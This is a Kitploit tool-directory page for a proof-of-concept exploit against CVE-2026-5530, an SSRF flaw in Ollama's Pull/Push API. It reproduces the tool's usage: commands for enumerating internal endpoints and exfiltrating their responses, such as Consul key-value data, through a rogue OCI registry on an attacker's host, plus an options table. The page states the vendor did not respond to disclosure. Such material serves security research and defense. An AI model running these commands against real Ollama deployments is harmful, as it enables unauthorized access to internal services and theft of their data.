Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-5530 — Proof-of-concept exploit for CVE-2026-5530, an SSRF in Ollama's Pull/Push API, enabling internal endpoint enumeration and full response exfiltration via a rogue OCI registry. | Kitploit
Tools/GitHubGitHub/davidrxchester/cve-2026-5530
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation Gathering
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

Proof-of-concept exploit for CVE-2026-5530, an SSRF in Ollama's Pull/Push API, enabling internal endpoint enumeration and full response exfiltration via a rogue OCI registry.

View Repository
4 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-5530

Ollama SSRF via OCI registry redirect with full response exfiltration.

Writeup: https://davidrochester.com/posts/cve-2026-5530

Disclosure

Ollama was contacted multiple times with no response.

Usage

Three modes: enum, exfil, and probe.

Enum

Finds live internal endpoints reachable from the Ollama host.

root@kitploit:~
python3 poc.py targets.txt --registry-host <your-ip>

Exfil

Exfiltrates SSRF responses when you know the response size.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

Binary searches for the response size automatically, then exfils.

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

Options

root@kitploit:~
target              URL or file of URLs (one per line, # for comments)
-p, --port          rogue registry port (default: 9999)
--exfil-port        exfil registry port (default: 10000)
--exfil             exfil mode, requires --size
--probe             binary search for size, then exfil
--size              Content-Length (required with --exfil)
--registry-host     your attacker IP/hostname that Ollama can reach
--ollama            Ollama API URL (default: http://127.0.0.1:11434)
Download Tool